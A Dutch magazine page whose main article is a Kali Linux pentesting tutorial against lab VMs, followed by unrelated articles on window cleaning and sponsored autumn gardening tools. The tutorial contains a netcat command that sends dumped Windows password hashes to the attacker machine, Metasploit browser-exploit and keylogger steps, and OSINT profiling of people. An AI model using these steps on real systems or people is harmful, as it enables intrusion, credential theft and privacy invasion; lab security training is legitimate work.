ID.nl logo
Zo blijf je hackers een stap voor met Kali Linux
© PXimport
Huis

Zo blijf je hackers een stap voor met Kali Linux

Je hebt een (thuis)netwerk en wilt hackers een stap voor blijven. Zelf in de huid van een hacker kruipen en je eigen netwerk, systemen en servers aanvallen is een uitstekende manier om kwetsbaarheden bloot te leggen, zodat je gerichte maatregelen kunt nemen. Deze vorm van ethisch hacken noemen we pentesting. In dit artikel gaan we aan de slag met enkele knappe tools, waaronder Kali Linux.

Pentesting, kort voor penetration testing, wordt wel vaker verward met een kwetsbaarheidsscan (vulnerability scan). Maar terwijl zo’n kwetsbaarheidsscan it-systemen via een geautomatiseerde procedure op zwakheden controleert en zich dus tot bekende beveiligingsfouten beperkt, gaat een pentester doorgaans verder. Met behulp van allerlei tools en creatieve aanvalstechnieken zoekt die geautomatiseerd en handmatig naar een zo breed mogelijke waaier aan kwetsbaarheden.

In dit artikel gaan we zelf met pentesting aan de slag. Daartoe maken we gebruik van Kali Linux. Deze distro bevat honderden pentesting-applicaties voor onder meer inventarisatie en enumeratie, sniffing en spoofing, wifi-aanvallen, kwetsbaarheidsanalyses, social engineering en het kraken van wachtwoorden. In deze masterclass moeten we ons noodzakelijkerwijs tot een handvol tools beperken.

Kali Linux is voor diverse platformen beschikbaar en laat zich zowel bare metal, dual boot, op een live medium als virtueel installeren. Wij kiezen voor de laatste methode en maken daarvoor gebruik van Oracle VM VirtualBox.

01 Kali-installatie

Download en installeer alvast VirtualBox. Start de tool op en kies Bestand / Voorkeuren / Netwerk. Druk op de knop Voeg NAT-netwerk toe en dubbelklik op het toegevoegde item. Eventueel pas je Netwerknaam en Netwerk CIDR (10.0.2.0/24) aan, maar zorg wel dat Inschakelen netwerk is aangevinkt. Bevestig met OK (2x).

Dan is het nu tijd om Kali Linux te virtualiseren. Ga naar de site van Kali Linux, open het tabblad Kali Linux VirtualBox Images en haal Kali Linux Vbox 64 bit Ova op. Die installeer je als volgt in VirtualBox: kies Bestand / Appliance importeren, verwijs naar je download en klik op Volgende. Dubbelklik eventueel op de naam als je die wilt wijzigen en start de operatie met Importeren. Na afloop start je de virtuele machine op. Je meldt je aan met root (gebruikersnaam), toor (wachtwoord). Even later duikt de Kali-desktop op: in het Applications-menu tref je al talrijke pentesting-tools aan. Mocht Kali niet willen opstarten, klik dan met rechts op je Kali-machine en kies Instellingen / USB: ga na of de optie USB 1.1 (OHCI) Controller wel is geselecteerd. Nu hoort het wél te lukken.

©PXimport

02 Kali-update

Je hebt dan wel een NAT-netwerk toegevoegd, maar je moet er ook voor zorgen dat Kali en naderhand ook de targets ditzelfde netwerk gebruiken. Zorg dat Kali is afgesloten en rechtsklik op het Kali-pictogram in de beheermodule van VirtualBox. Kies Instellingen / Netwerk en kies bij Gekoppeld aan de optie NAT-netwerk. In het uitklapmenu bij Naam vind je het betreffende netwerk terug. Je mag nu Kali (weer) opstarten, waarna we de distro eerst gaan updaten. Start de desktop op en klik op het icoon Terminal, waarna je de volgende opdracht uitvoert:

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

Hiermee start je een langdurige procedure die heel af en toe om een bevestiging vraagt en die je maar beter niet onderbreekt.

©PXimport

03 Target-installaties

Het lijkt ons niet zo veilig om onze pentesting-experimenten meteen maar in een productie-omgeving uit te voeren. Liever gebruiken we enkele eveneens gevirtualiseerde targets. Een voor de hand liggend slachtoffer is alvast Metasploitable, een Ubuntu-distributie die opzettelijk van talrijke kwetsbaarheden is voorzien, precies met het oog op pentesting. Je downloadt die op Sourceforge. Pak het zip-bestand uit, start VirtualBox, klik op Nieuw, vul bij Type Linux en bij Versie Ubuntu (64-bit) in. 1 GB ram-geheugen kan volstaan. Selecteer Gebruik een bestaand virtuele harde schijf bestand en verwijs naar het uitgepakte vmdk-bestand. Bevestig met Aanmaken. Start het systeem op en log in met msfadmin, zowel voor de gebruikersnaam als het wachtwoord, en controleer of je wel met de juiste toetsenbordindeling werkt.

Laten we ook een paar (oudere) Windows-versies installeren. Voor Windows 7 en 10 kun je voor ova-appliances op de site van Microsoft terecht (bij Select platform kies je VirtualBox). Windows XP (SP3) kun je nog vinden op www.softlay.net, waar je Windows / Windows XP ISO selecteert. Omdat we deze targets zoveel mogelijk onbeschermd willen laten, kun je de automatische updatefunctie van Windows het best uitschakelen.

©PXimport

Extern

Heb je niet de tijd of de kennis om zelf uitvoerige pentests op je it-infrastructuur uit te voeren? Dan kun je ook altijd een specialist inhuren. Er zijn verschillende bedrijven die gespecialiseerd zijn in zulke tests. Ga na of de pentester(s) wel over een VOG (Verklaring Omtrent het Gedrag) en de nodige certificaten beschikt, zoals OSCE/OSCP (Offensive Security Certified Expert/Professional). Maak vooraf ook eenduidige afspraken omtrent de gebruikte methodes en de (ingeschatte) duur van de tests. Vaak wordt er een onderscheid gemaakt tussen black, grey en white box pentests, waarbij de pentesters vooraf in toenemende mate over bruikbare informatie over je it-infrastructuur en systemen beschikken.

04 Snelle scan

Zoals gezegd bevat Kali vele tientallen pentesting-tools, verdeeld in uiteenlopende rubrieken als Vulnerability Analysis, Web Application Analysis, Password Attacks, Exploitation Tools en Information Gathering. We beginnen ons experiment met de laatste: een van de eerste stappen die ook een hacker zal zetten.

We starten met een eenvoudige opdrachtregeltool: dmitry. Die vind je via Applications / Information Gathering / dmitry. In zijn eenvoudigste vorm hoef je slechts een domeinnaam op te geven (bijvoorbeeld dmitry computertotaal.nl). Dat levert al heel wat informatie op, waaronder ip-adres, nameservers, subdomeinen, registrar, enz. Het wordt al wat spannender als je je Metasploitable-installatie analyseert. Uiteraard moet dat systeem dan wel actief zijn: via het commando ifconfig kom je het ip-adres van je Metasploitable (eth0) te weten, waarna je vanuit Kali deze opdracht kunt uitvoeren:

dmitry <ip-adres-metasploitable> -pb

De parameter -pb zorgt voor een poortscan, inclusief de banners van de gebruikte software.

©PXimport

05 Transformatieconcept

Een informatietool van een geheel andere orde is (de gratis community edition van) Maltego. Die maakt handig gebruik van publiek beschikbare bronnen om allerlei informatie over organisaties of personen op te vissen. Je dient je wel eerst bij Maltego te registreren. Daarna ga je naar Applications / Information gathering / Maltego en klik je bij Matego CE (Free) op Run. Meld je bij de dienst aan en bevestig met Next (3x) en met Finish.

In het Transform Hub-venster tref je een reeks zogenoemde transforms aan: dat zijn processen die publieke data over het beoogde doelwit kunnen opvragen en deze data vervolgens naar een overzichtelijke informatiestructuur transformeren. De transform PATERVA CTAS CE is standaard al geïnstalleerd. Er zijn nog heel wat andere transforms die je kunt installeren, zoals Kaspersky Lab, VirusTotal Public API, Have I Been Pwned? enzovoort. De meeste vergen wel een token of API-sleutel, aan te vragen bij de respectieve producenten.

©PXimport

06 Transformatiegrafieken

Aan de slag nu. Klik linksboven op het plusknopje Create a new graph: in het linkerpaneel verschijnt een reeks functies, zoals Infrastructure, Penetration Testing, Malware, Personal enzovoort. We beperken ons hier tot twee voorbeelden.

Zo vind je in de rubriek Infrastructure de Domain-functie terug: sleep die naar het nog lege canvas, dubbelklik hierop en vul de domeinnaam in die je wilt onderzoeken. Rechtsklik vervolgens op dit item en kies (bijvoorbeeld) DNS from Domain / Run All om de bijbehorende transforms uit te voeren. Het resultaat is een (ook grafisch) overzicht van zowat alle sites en servers die met dit domein te maken hebben. Rechtsklik op een subitem voor nog meer gedetailleerde informatie.

Ook over personen kun je informatie opvragen. Open de rubriek Personal en sleep Person naar het canvas. Dubbelklik om hier zelf een persoonsnaam in te kunnen tikken en laat er desgewenst alle transforms op los. Voor Twitter moet je wel eerst nog je toestemming verlenen. Vervolgens druk je op de knop Run!; je hoeft hier niet per se specifieke domeinen in te vullen. Als het goed is duiken even later telefoonnummers, adressen, websites enzovoort op die met die persoon verband houden. Ook hier kun je rechtsklikken op subitems om nog dieper te kunnen graven naar bruikbare informatie.

©PXimport

07 Nikto: snelle scan

Niet alleen informatierondes, maar ook kwetsbaarheidsanalyses vormen een essentieel onderdeel van het takenpakket van een pentester. Ook op dit vlak stelt Kali allesbehalve teleur. We beperken ons in deze masterclass noodgedwongen tot twee tools uit dit arsenaal.

De eerste is Nikto, waarmee je verschillende webservers zoals de populaire Apache en Nginx op zo’n 7000 kwetsbaarheiden kunt scannen.

De Metasploitable-installatie vormt alvast een uitstekend doelwit voor Nikto. Start het systeem op in VirtualBox en ga via ifconfig na wat het interne ip-adres is. Vervolgens start je Nikto op via Applications / Vulnerability Analysis / nikto en voer je dit opdrachtregelcommando uit:

nikto -h <ip-adres-metasploitable>

Het resultaat volgt vrijwel onmiddellijk: in Metasploitable blijkt standaard een (verouderde) Apache-server actief (Apache/2.2.8 (Ubuntu)) en Nikto somt dan ook maar meteen een aantal mogelijke exploits op, zoals “The anti-clickjacking X-Frame-Options header is not present” en “The X-XSS-Protection header is not defined”. Even googelen brengt je al een heel eind op weg om zulke kwetsbaarheden te exploiteren of op te lossen. Je kunt hiervoor onder meer terecht op deze website.

©PXimport

08 OpenVAS installeren

Een andere kwetsbaarheidsscanner is OpenVAS oftewel Opensource Vulnerability Assessment System. Jammer genoeg is deze tool standaard niet in Kali geïnstalleerd, maar dat breng je snel in orde met het opdrachtregelcommando:

apt-get update && apt-get install -y openvas

Zodra deze operatie achter de rug is, voer je het commando openvas-setup uit. Deze setup kan een hele poos duren, want er worden enkele tienduizenden kwetsbaarheidstests gedownload, ook wel nvt’s of network vulnerability tests genoemd.

Aan het einde van de rit geeft OpenVAS je een uiterst complex wachtwoord, maar dat laat zich gelukkig aanpassen met het commando:

openvasmd --user=admin --new-password=<nieuw_wachtwoord>

Vervolgens voer je ook het commando greenbone-nvt-sync uit, zodat de lokale nvt’s via een feedservice up-to-date worden gehouden.

Met openvas-start zet je OpenVAS in gang. De standaardbrowser Firefox ESR verbind je met de webinterface van OpenVAS (https://127.0.0.1:9392). De browser klaagt weliswaar over een onveilige verbinding, maar dat stuur je bij via Advanced / Add Exception / Confirm Security Exception. Normaliter hoor je je nu wel te kunnen aanmelden met admin en het zojuist aangepaste wachtwoord.

©PXimport

09 OpenVAS uitvoeren

Vanuit het OpenVAS-dashboard kun je meteen een scan uit laten voeren, en waarom niet op onze Metasploitable-machine?

Open het menu Scans / Tasks, klik linksboven op het toverstokpictogram en kies Task Wizard, waarna je het ip-adres van je Metasploitable-systeem invult. Je begint het scanproces met Start scan. Het controleren van enkele tienduizenden potentiële kwetsbaarheden blijkt een werk van lange adem. Standaard ververst je browser elke 30 seconden het beeld (zie rechtsboven: Refresh every 30 Sec.). Duikt een foutmelding op, dan krijg je de scan met Ctrl+R wel weer op de rails.

Na afloop van de scanronde klik je het cijfer in de kolom Reports aan: je verneemt nu hoeveel kwetsbaarheden er zijn aangetroffen en hoe ernstig die ingeschat worden.

Op ons Metasploitable-toestel bleek het te gaan om 56 kwetsbaarheden, waarvan 3 Low, 36 Medium en 17 High. Voor een uitvoerig rapport klik je op de datum in de Date-kolom. Elke kwetsbaarheid wordt dan omschreven en je krijgt het getroffen poortnummer (Location) en een QoD-indicatie (Quality of Detection) te zien om de betrouwbaarheid van de detectie aan te geven. Nuttig is ook de kolom Solution type, met indicaties als VendorFix, Workaround, Mitigation (inperking) of in het slechtste geval WillNotFix. Je hoeft zo’n kwetsbaarheid maar aan te klikken om uitgebreide feedback te krijgen. Zo’n rapport laat zich trouwens ook naar diverse formaten exporteren, waaronder csv, html en pdf.

©PXimport

10 Wachtwoordgeneratoren

Het zal je weinig verbazen dat pentesters niet vies zijn van een potje wachtwoordkraken. Dat kan met ‘brute force’ (alle mogelijke combinaties uitproberen), op basis van een woordenboek (met potentiële wachtwoorden) of met behulp van ‘rainbow tables’ (lijsten met mogelijke hashes – dat is de vorm waarin wachtwoorden vaak door een systeem worden bewaard – in combinatie met de bijbehorende wachtwoorden).

In de rubriek Password Attacks vind je alvast een heel arsenaal. Zo tref je in de subrubriek Password Profiling & Wordlists bijvoorbeeld de wachtwoordgenerator Cewl aan. Die vist automatisch potentiële wachtwoorden op uit een website, evenals gebruikersnamen uit e-mailadressen: die komen van pas bij social engineering. Dat testen we opnieuw even uit op de Metasploitable-machine met een opdrachtregelcommando als:

cewl <ip-adres-metasploitable> -w cewlwoorden.txt -d 4

Hiermee extraheer je alle kandidaat-wachtwoorden tot vier linkniveaus diep, waarna die automatisch in het tekstbestand cewlwoorden.txt worden opgeslagen. Dit proces is behoorlijk arbeidsintensief, maar het laat zich altijd nog onderbreken met Ctrl+C. Je kunt het resultaat vervolgens bekijken met een opdracht als nano cewlwoorden.txt.

©PXimport

11 Wachtwoorden kraken

De populaire wachtwoordkraker John The Ripper, die zelfs overweg kan met Windows-hashes, ontbreekt evenmin in Kali. We tonen even hoe je via een remote sessie de accountwachtwoorden achterhaalt op je Windows XP-systeem. We gaan wel uit van het scenario waarbij je als aanvaller via een exploit intussen al shell-access hebt tot die machine – dit scenario komt trouwens verder in deze masterclass nog aan bod. Door middel van deze shell-access heb je intussen ook al twee portable programma’s op de XP-machine gezet: Netcat en Windows Credentials Editor. Dit laatste voer je (zo nodig remote) uit met het commando wce -l -o windowshashes.txt: dit commando zorgt ervoor dat de Windows-hashes in het tekstbestand windowshashes.txt terechtkomen.

De bedoeling is nu dat we dit tekstbestand via een netcat-sessie overbrengen naar de Kali-machine. Open daartoe een nieuw Terminal-venster in Kali en start een luistersessie op bijvoorbeeld poort 1111 met nc -l -p 1111 >windowshashes.txt. Op de Windows XP-machine voer je deze opdracht uit:

nc -w 3 <ip-adres-Kali-machine> 1111 <windowshashes.txt

En dan nu over naar de gui-interface van John the Ripper: ga naar Applications / Password attacks / Johnny. Hier klik je op Open password file, kies je (PASSWD format) en haal je windowshashes.txt in de rootmap op.

©PXimport

Arsenaal

Wanneer je googelt naar de populairste of de ‘beste’ pentesting-tools, dan zie je vaak dezelfde namen voorbijkomen. Een aantal ervan is in dit artikel al expliciet aan bod gekomen, maar er zijn er natuurlijk nog meer. Zo worden Nmap en gui Zenmap vaak gebruikt om systemen of netwerken op kwetsbaarheden te scannen en is Wireshark een van de beste tools om netwerkdata en -protocollen te analyseren. Aircrack-ng en Kismet zijn juist erg populair om de veiligheid van draadloze netwerken te controleren. Ook OWASP-ZAP zal zelden ontbreken in het arsenaal van de doorgewinterde pentester: hiermee vis je snel allerlei kwetsbaarheden op in webapplicaties. Burp Suite is een krachtige webproxy waarmee je alle verkeer tussen browser en server kunt opvangen, ideaal om kwetsbaarheden als sql-injectie of XSS te detecteren. Zeer degelijke web-kwetsbaarheidsscanners zijn bijvoorbeeld ook nog Acunetix en Netsparker, maar beide zijn behoorlijk aan de prijs. Alle andere vermelde tools vind je gewoon in Kali.

©PXimport

12 Windows-exploitatie

Kali beschikt ook over krachtig gereedschap om remote root access te verkrijgen, waaronder het Metasploit-framework en de bijbehorende gui Armitage. We tonen je hoe je zoiets voor elkaar krijgt op de Windows XP-machine.

Open Applications / Exploitation tools / armitage en klik op Connect en op Yes om verbinding te maken met het Metasploit-framework. Armitage start op en we willen hier

een exploit selecteren waarvan we weten dat die via een (verouderde) browser op een XP-toestel kan worden uitgevoerd. Klik op exploit / windows / browser en dubbelklik op ms14_064_ole_code_execution. Bevestig met Launch.

Onderaan lees je het Local IP af. Je moet de gebruiker van de XP-machine zover krijgen dat die dat adres in zijn browser intikt. In werkelijkheid gebeurt zoiets wellicht via phishing, maar hier tikken we het gewoon zelf in de XP-browser in. Ogenschijnlijk gebeurt er niets, maar terug bij je Kali-machine zie je dat de gecompromitteerde XP-machine al is toegevoegd. Rechtsklik op de bijbehorende miniatuurweergave en kies Meterpreter 1 / Interact / Meterpreter Shell. Onderaan verschijnt nu de prompt meterpreter >. Het commando help geeft je meer uitleg. Je kunt van hieruit nu allerlei commando’s op je XP-machine uitvoeren, zoals cd\, ls, ps enzovoort.

Ga ook even na wat er gebeurt als je Meterpreter 1 / Explorer / Log Keystrokes opstart: wanneer je op Launch klikt, lanceer je een keylogger op de XP-machine die alle toetsaanslagen opslaat in het vermelde txt-bestand. We zeiden het al: met roottoegang wordt zowat alles mogelijk!

©PXimport

▼ Volgende artikel
Helder verhaal: 5 slimme trucs voor sprankelend schone ramen
© Alexander Raths
Huis

Helder verhaal: 5 slimme trucs voor sprankelend schone ramen

Ramen lappen staat zelden bovenaan je lijstje met favoriete klussen, maar het resultaat spreekt altijd voor zich. Schone ramen laten meer licht binnen, geven je huis een frisse uitstraling en maken het uitzicht net een stukje fraaier. En het hoeft echt geen tijdrovend karwei te zijn. Met deze vijf simpele methodes krijg je je ramen snel weer sprankelend schoon.

Hik je ook zo aan tegen het lappen van je ramen?

We hebben 5 tips voor je waarmee je tijd (én frustratie) kunt besparen:

1: Gouden combi: glasreiniger + microvezeldoek 2: Water met afwasmiddel 3: Lekker streeploos met azijn 4: Raamwisser 5: Regelmatig lappen

Lees ook: Top 10 vervelendste huishoudklussen: zo maak je ze leuker!

1: Glasreiniger en microvezeldoek, een gouden duo

De klassieker onder de schoonmaakmethodes blijft glasreiniger in sprayvorm, gecombineerd met een microvezeldoek. Het werkt snel, gemakkelijk en levert in de meeste gevallen een streeploos resultaat op. Spuit de reiniger gelijkmatig over het raamoppervlak: niet te spaarzaam, maar ook niet zo veel dat het in straaltjes naar beneden loopt. Neem vervolgens een microvezeldoek en poets het glas in rustige, cirkelvormige bewegingen. Begin in een hoek en werk stap voor stap naar de andere kant, zodat je geen plekken overslaat. Heb je te maken met hardnekkige vlekken, laat de spray dan even kort inwerken voordat je begint met poetsen. Wil je het glas net dat beetje extra glans geven, dan kun je de doek op een gegeven moment ook vervangen door een prop krantenpapier. Dat geeft een verrassend mooi effect.

Glasreiniger of ruitenreiniger?

In de winkel vind je flessen met glasreiniger en ruitenreiniger. Hoewel ze op het eerste gezicht vergelijkbaar lijken, is er wel een verschil. Glasreinigers zijn ideaal voor het schoonmaken van gladde, niet-poreuze oppervlakken zoals spiegels en glazen meubels binnenshuis. Ze verwijderen snel vlekken en vingerafdrukken zonder strepen achter te laten. Ruitenreinigers daarentegen zijn ontworpen voor grotere oppervlakken, zoals autoruiten en buitenramen. Ze pakken niet alleen vlekken en vingerafdrukken aan, maar ook hardnekkiger vuil, en ze drogen snel op zonder strepen of vlekken na te laten. Voor de binnenkant van de ramen is een glasreiniger (zoals Glassex of Ajax Glasreiniger) dus prima geschikt; voor de ramen buitenkant, die vaak viezer zijn, heb je meer aan een ruitenreiniger zoals bijvoorbeeld HG ruitenreiniger.

©Voyagerix - stock.adobe.com

2: Warm water met een scheut afwasmiddel

Heb je geen glasreiniger in huis of zijn je ramen uitzonderlijk vuil, dan is een emmer met warm water en een paar druppels afwasmiddel een uitstekende oplossing. Vul de emmer met schoon, warm water, voeg er een beetje afwasmiddel aan toe en maak de ramen schoon met een zachte spons of een niet-pluizende doek. Werk steeds van boven naar beneden om te voorkomen dat er druipsporen ontstaan. Zodra het raam helemaal is afgenomen, pak je een raamwisser om het water in vloeiende banen weg te trekken. Zorg ervoor dat je de wisser na elke haal even droogveegt, zodat er geen strepen achterblijven. Droog daarna de randen en hoeken na met een schone, pluisvrije doek.

Woon je in een gebied met hard water, dan is het slim om gedestilleerd water te gebruiken. Daarmee verklein je de kans op witte vlekken en kalkresten die anders zichtbaar kunnen opdrogen.

💡 Kies een bewolkte dag om je ramen te lappen. In de felle zon droogt het water namelijk sneller op, waardoor je meer kans hebt op strepen.

3: Voor een streeploos resultaat: azijn

Wie liever met natuurlijke middelen schoonmaakt, kan uitstekend terecht bij een oplossing van water en witte azijn. Meng één deel azijn met drie tot vier delen water in een lege plantenspuit, schud even goed en spray het mengsel royaal op de ramen. Gebruik een microvezeldoek of een oude, schone theedoek om het raam grondig te poetsen. Net als bij de glasreiniger kun je voor extra glans ook hier weer krantenpapier gebruiken om na te wrijven.

Azijn heeft als groot voordeel dat het vet en vuil oplost, en bovendien strepen tegengaat. Houd er wel rekening mee dat de geur tijdens het schoonmaken even sterk kan zijn. Gelukkig verdwijnt die snel zodra de ramen droog zijn. Zo houd je een fris en helder resultaat over, zonder chemische schoonmaakmiddelen.

💡 Vergeet de kozijnen niet! Een schoon raam in een vuil kozijn ziet er maar 'half af' uit.

Ook interessant:
10x (goedkoop!) je huis schoon met soda, groene zeep en azijn

4: Efficiënt werken met een raamwisser

Wil je vooral snel en efficiënt resultaat, dan is een raamwisser je beste bondgenoot. Begin met het wassen van het raam volgens een van de eerdere methodes, zet de raamwisser vervolgens in de bovenhoek en trek hem in een rechte, horizontale beweging naar de andere kant. Veeg de wisser na elke haal af met een droge doek, zodat vuil en water zich niet opnieuw over het glas verspreiden. Zorg er daarnaast voor dat je elke baan een klein beetje laat overlappen met de vorige, zodat er geen strepen of gemiste stroken ontstaan. Sluit af door de randen van het raam en de vensterbank droog te maken met een schone doek. Daarmee voorkom je dat er druppels of watervlekken achterblijven.

💡 Voor moeilijk bereikbare buitenramen kun je een telescopische raamwisser gebruiken.

©Brian Jackson

5: Houd je ramen bij door regelmatig te lappen

Tot slot een tip die misschien niet leuk klinkt, maar wel een groot verschil maakt: maak je ramen regelmatig schoon. Door ze vaker even snel af te nemen, voorkom je dat vuil en aanslag zich ophopen en vastkoeken. Dat betekent dat je minder hard hoeft te boenen en sneller klaar bent. Bovendien blijven je ramen langer helder, waardoor je altijd kunt genieten van een fris uitzicht. Mooier kunnen we het niet maken, wel een stuk makkelijker.

💡 Last van condens op je ramen? Ventileer wat vaker of verweeg een luchtontvochtiger.

Conclusie

Met deze tips en een beetje voorbereiding wordt ramen lappen een stuk eenvoudiger. Door slim te werken en de juiste schoonmaakmiddelen te gebruiken, zorg je ervoor dat je ramen er in no-time netjes uitzien!


🧽 ❌ Niet meer schoon te krijgen?
Vraag dan een offerte aan voor nieuwe ramen 👇🏼

Vraag een offerte aan voor een glaszetter:

▼ Volgende artikel
Tuinonderhoud in het najaar: dit is hét moment om aan de slag te gaan
© Gardena
Huis

Tuinonderhoud in het najaar: dit is hét moment om aan de slag te gaan

Als de zomer ten einde loopt, verdwijnt bij veel mensen de aandacht voor de tuin. Toch is het najaar een van de belangrijkste periodes voor tuinonderhoud. Wie nu opruimt en snoeit, voorkomt extra werk in het voorjaar. En met het juiste gereedschap is dat makkelijker dan je denkt!

Partnerbijdrage - in samenwerking met Gardena

Vallende blaadjes, uitgebloeide planten, struiken en bomen die in de zomer flink zijn gegroeid – juist in het najaar vraagt de tuin om aandacht. Hieronder lees je welke klussen je nu kunt uitpakken en welk gereedschap daarbij van pas komt.

Snoeien: nu knippen is straks genieten

Veel vaste planten, struiken en jonge bomen groeien in de zomer flink door. Door ze in het najaar te snoeien, houd je ze in model en voorkom je dat zwakke of te lange takken bij de eerste storm afbreken. Snoeien is ook belangrijk voor de gezondheid van de plant: zo krijgen lucht en licht krijgen meer ruimte, wat schimmelvorming tegengaat.

Voor dunne takken en jong hout is een scherpe snoeischaar vaak al genoeg. De Gardena PremiumCut Flex is daar een goed voorbeeld van. Deze stevige bypass-schaar is bedoeld voor groen hout tot 24 mm dik. Dankzij de ergonomische handgreep en PowerCoating werk je nauwkeurig en hoef je geen extra kracht uit de oefenen. De coating zorgt er bovendien voor dat je de snoeischaar makkelijk schoon kunt maken en houden.

©Gardena

Bypass?

Een bypass-snoeischaar werkt met twee gebogen snijbladen die langs elkaar heen glijden – net als bij een gewone schaar. Die beweging zorgt voor een scherpe, nauwkeurige snede, dicht bij de stengel. Deze techniek beschadigt het plantweefsel nauwelijks en is daardoor ideaal voor het snoeien van jong, levend hout. Je merkt het verschil vooral bij vers hout: de schaar knipt scherp en de snoeiwond blijft netjes.

Gaat het om iets dikkere takken, bijvoorbeeld van struiken of jonge bomen, dan is een takkenschaar praktischer. De Gardena EasyCut S is een compacte en lichte takkenschaar met een sterke bypass-snede. Hij heeft een snoeidiameter van 4,5 centimeter. Dankzij zijn ergonomische ontwerp en zijn gewicht van net 900 gram kun je lekker vlot doorwerken.

💡Tip: snoei op een droge dag, zodat de snoeiwonden snel kunnen indrogen en je schimmel geen kans geeft.

©Gardena

Blad op het gazon? Tijd voor actie

Afgevallen bladeren horen bij de herfst, maar laat je ze liggen, dan gaan ze al snel tegen je werken. Zeker op het gazon vormen ze een natte, compacte laag die het gras verstikt. Mos en schimmels krijgen vrij spel, en in het voorjaar zie je de kale plekken terug. Blad opruimen is dus geen overbodige luxe.

Voor kleine oppervlakken of om gevallen blad uit borders en perken te halen is een hark vaak al voldoende. De Gardena combisystem bladhark is verstelbaar in breedte, van 30 tot 50 centimeter, zodat je hem kunt aanpassen aan de situatie. Smal bij struiken of tussen planten, breder op het gazon. Je klikt hem vast op een steel naar keuze, waardoor je ook prettig rechtop kunt blijven werken.

©Gardena

Wil je sneller klaar zijn, dan is een bladblazer of -zuiger handiger. De Gardena PowerJet Collect werkt op een 18V accu en combineert blazen en zuigen ineen. Je kunt bladeren dus op een hoop blazen óf ze direct opzuigen. Doe je dat laatste, dan zorgt de geïntegreerde hakselaar dat het bladafval meteen versnipperd wordt. Is de opvangzak vol, dan is het opgevangen materiaal meteen klaar voor op de composthoop of in de groenbak.

©Gardena

Liever geen herrie of gedoe met stroom? Dan is de Gardena bladverzamelaar een slim alternatief. Deze tuinruimer werkt volledig mechanisch: je duwt hem als een karretje over het gazon en de draaiende borstels vegen het blad naar binnen. Je hoeft dus niet meer zelf telkens te bukken om opgehoopt blad te verzamelen en weg te gooien. Het borstelmechanisme is in hoogte verstelbaar, afhankelijk van de ondergrond. Handig: je kunt hem ook gebruiken na het grasmaaien of verticuteren. En dat allemaal zonder lawaai!

En waar laat je al dat groenafval?

Tijdens het snoeien en harken verzamel je al snel een flinke berg groenafval. Takken, bladeren, uitgebloeide planten – het is handig om daar meteen een verzamelpunt voor te hebben. De Gardena pop-up tuinafvalzakbiedt uitkomst. Deze stevige, rechthoekige zak klapt vanzelf open en blijft goed rechtop staan. Daardoor kun je er gemakkelijk takken en blad in kwijt, zonder dat de zak steeds omvalt. Met een inhoud van 127 liter hoef je niet steeds heen en weer te lopen. Klaar? Dan vouw je de zak plat op, zodat hij weinig ruimte inneemt in de schuur of garage.

💡Tip: gebruik meerdere zakken om te scheiden wat je kunt composteren (bladeren, plantresten) en wat naar de gemeentelijke groenophaal moet (ziek of besmet plantmateriaal, dikke takken).

©Gardena

Het najaar als onderhoudsseizoen

Hoewel het in het najaar lijkt alsof de tuin tot rust komt, is dit juist het moment om dingen aan te pakken. Je zorgt dat de tuin winterklaar is, zodat je er in het voorjaar weer helemaal van kunt genieten. Bovendien werk je vaak in prettig weer: niet te heet, niet te droog, geen muggen meer. En zeg nou zelf: het voelt goed om de tuin netjes en opgeruimd achter te laten voordat de winter echt begint!

Met goed gereedschap wordt dat werk een stuk makkelijker. Gardena helpt daarbij, met alles van snoeischaren en bladverzamelaars tot stevige tuinafvalzakken. Het enige wat jij nog hoeft te doen, is aan de slag gaan.